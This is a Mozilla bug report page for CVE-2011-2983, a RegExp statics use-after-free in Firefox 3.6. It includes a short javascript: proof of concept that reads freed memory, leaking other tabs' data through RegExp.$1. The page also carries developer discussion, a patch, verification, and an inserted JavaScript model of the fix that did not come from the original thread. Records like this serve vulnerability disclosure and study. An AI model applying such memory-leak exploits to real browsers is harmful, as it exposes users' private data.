Bug 626297 - (CVE-2011-2983) regexp-statics possibly allows to read private data
Status: RESOLVED FIXED
Whiteboard: [sg:high]
Keywords: verified1.9.2
Product: Core
Classification: Components
Component: JavaScript Engine
Version: 1.9.2 Branch
Platform: x86 Windows Vista
Importance: -- normal
Assigned To: Chris Leary [:cdleary] (not checking bugmail)
Depends on: 674545
Reported: 2011-01-16 18:00 PST by shutdown
Modified: 2014-07-22 13:05 PDT
Flags: rforbes: sec-bounty+
Tracking flags (branch labels not preserved on this page): unaffected, unaffected, unaffected, .20+, .20-fixed, wontfix

Attachments:
- screenshot of the success case (92.67 KB, image/jpeg), 2011-01-16 18:00 PST, shutdown
- Add pending input. (11.84 KB, patch), 2011-04-15 16:46 PDT, Chris Leary [:cdleary] (not checking bugmail); mrbkap: review+, christian: approval1.9.2.20+

Description shutdown 2011-01-16 18:00:32 PST
Created attachment 504334 [details]
screenshot of the success case

Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.2.13) Gecko/20101203

Description:
When RegExp.input is set,
JSSubString which RegExp.$1 uses becomes a dangling pointer.
So, scripts can read a freed-and-recycled memory area.

Testcase:

1. Open the new tab and execute:

javascript:
  function S(v) { return "xxxxxxx,xxxxxxx,xxxx" + v; }
  /^(.*)/.exec(S(0));
  RegExp.input = S(1);
  clearInterval(window.tid);
  window.tid = setInterval(function () {
    document.title = "[" + RegExp.$1 + "]";
  }, 1000);
  void 0;

2. Then browse some sites in other tabs.
Comment 1 Brendan Eich [:brendan] 2011-01-16 18:45:23 PST
Seems like a dup of bug 610223.

/be
Comment 2 Daniel Veditz [:dveditz] 2011-01-20 13:48:30 PST
(In reply to comment #1)
> Seems like a dup of bug 610223.

That bug was marked as a trunk-only YARR regression that didn't affect 1.9.2.
Comment 4 Chris Leary [:cdleary] (not checking bugmail) 2011-01-20 15:43:55 PST
(In reply to comment #2)
> That bug was marked as a trunk-only YARR regression that didn't affect 1.9.2.

Yeah, I assumed YARR introduced it -- are our regression tests being backported to 1.9.2 at all? I don't know how that process works.
Comment 5 Daniel Veditz [:dveditz] 2011-03-03 13:50:35 PST
(In reply to comment #4)
> Yeah, I assumed YARR introduced it -- are our regression tests being backported
> to 1.9.2 at all? I don't know how that process works.

Not in general. Sometimes/often the regression tests are checked in to the branch along with a specific security bug back-port. Since the YARR regression didn't affect the branches its patch (and therefore regression tests) were not checked in.

We don't always check in tests, depending on how obviously they point at the vulnerability we often wait until we've issued fixes and advisories for the supported branches before checking them in. We set the in-testsuite flag to "?" to remind us to go back and do so.
Comment 6 Chris Leary [:cdleary] (not checking bugmail) 2011-04-15 16:46:06 PDT
Created attachment 526428 [details] [diff] [review]
Add pending input.

Patch against mc-192. User only has access to res->pendingInput through the object interface. res->input is set iff a successful match is performed or (friend API) js_ClearRegExpStatics is called for save/restore junk; failure in the regexp execution clears the statics entirely.
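Added example, not the patch's code and not SpiderMonkey's: a small JavaScript model of the invariant comment 6 describes. Capture groups are kept as offsets into the string that produced the last successful match (standing in for the JSSubString pointers from the description), an assignment to RegExp.input goes to a separate pending slot, and a failed execution clears everything. The class and helper names (RegExpStaticsModel, replayTestcase, matchInput, pendingInput, splitPendingInput) are my own, and the pre-patch "legacy" mode is a simplification of the bug rather than the engine's real code. The block assumes ES2022 regexp match indices (the `d` flag), i.e. Node 16 or newer.

```javascript
// Added example (not SpiderMonkey code): model of the RegExp statics object
// before and after the "pending input" split described in comment 6.
// Capture groups are stored as [start, end] offsets into the string of the
// last successful match, standing in for pointers into that buffer.
// Assumes ES2022 regexp match indices (the `d` flag), i.e. Node 16 or newer.
class RegExpStaticsModel {
  // splitPendingInput=false models the pre-patch behaviour, where assigning
  // RegExp.input replaced the buffer that the $1..$9 offsets refer to.
  constructor({ splitPendingInput = true } = {}) {
    this.splitPendingInput = splitPendingInput;
    this.clear();
  }

  // A failed execution clears the statics entirely.
  clear() {
    this.matchInput = null;   // string that produced the last successful match
    this.pendingInput = null; // value assigned via RegExp.input, not yet matched
    this.parens = [];         // [start, end] offsets into matchInput
  }

  // Run `re` against `str`; only a successful match updates matchInput.
  exec(re, str) {
    const flags = re.flags.includes("d") ? re.flags : re.flags + "d";
    const m = new RegExp(re.source, flags).exec(str);
    if (m === null) {
      this.clear();
      return null;
    }
    this.matchInput = str;
    this.pendingInput = null;
    // Unmatched optional groups have no indices; treat them as empty.
    this.parens = m.indices.slice(1).map((ix) => ix ?? [0, 0]);
    return m;
  }

  // RegExp.input setter.
  set input(value) {
    if (this.splitPendingInput) {
      this.pendingInput = String(value); // offsets keep pointing at matchInput
    } else {
      // Pre-patch analogue: the buffer the offsets refer to is swapped out.
      // In JS this just reads the wrong string; in the engine the old buffer
      // could already have been freed and reused.
      this.matchInput = String(value);
    }
  }

  // RegExp.input getter: a pending assignment wins until the next match.
  get input() {
    return this.pendingInput ?? this.matchInput ?? "";
  }

  // RegExp.$n getter: slices the buffer the offsets were taken from.
  paren(n) {
    const ix = this.parens[n - 1];
    if (!ix || this.matchInput === null) return "";
    return this.matchInput.slice(ix[0], ix[1]);
  }
}

// Replays the sequence from the bug's test case against a model and returns
// what RegExp.$1 and RegExp.input would report afterwards.
function replayTestcase(model) {
  const S = (v) => "xxxxxxx,xxxxxxx,xxxx" + v;
  model.exec(/^(.*)/, S(0));
  model.input = S(1);
  return { dollar1: model.paren(1), input: model.input };
}

const fixed = replayTestcase(new RegExpStaticsModel());
const legacy = replayTestcase(new RegExpStaticsModel({ splitPendingInput: false }));
console.log("fixed:  ", fixed);  // $1 still reflects the S(0) match
console.log("legacy: ", legacy); // $1 now reads out of the S(1) buffer
```

In the fixed model, $1 continues to reflect the S(0) match after RegExp.input is reassigned, while RegExp.input reports the pending value; in the legacy model the same sequence makes $1 read from whatever buffer now sits behind the statics, which is the observable shape of the original report.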
Comment 7 Chris Leary [:cdleary] (not checking bugmail) 2011-07-19 11:23:42 PDT
Comment on attachment 526428 [details] [diff] [review]
Add pending input.

Maybe that was the wrong ? to set.
Comment 8 christian 2011-07-20 10:23:24 PDT
Comment on attachment 526428 [details] [diff] [review]
Add pending input.

a=LegNeato for 1.9.2.20.
Comment 9 Chris Leary [:cdleary] (not checking bugmail) 2011-07-22 11:21:59 PDT
http://hg.mozilla.org/releases/mozilla-1.9.2/rev/271682c48f66
Comment 10 Al Billings [:abillings] 2011-08-09 14:28:47 PDT
Verified fixed in 1.9.2.20 (Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.7; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20) using code in comment 0. No longer leaking private data as we are in 1.9.2.19 when I tested it.
Comment 11 Brandon Sterne (:bsterne) 2011-08-12 10:29:28 PDT
Al, why did you move this from .20-fixed to .21-fixed?  Did this not make the build?
Comment 12 Al Billings [:abillings] 2011-08-12 11:37:04 PDT
I did not purposefully change the keyword.
Comment 13 Raymond Forbes[:rforbes] 2013-07-19 18:30:07 PDT
rforbes-bugspam-for-setting-that-bounty-flag-20130719
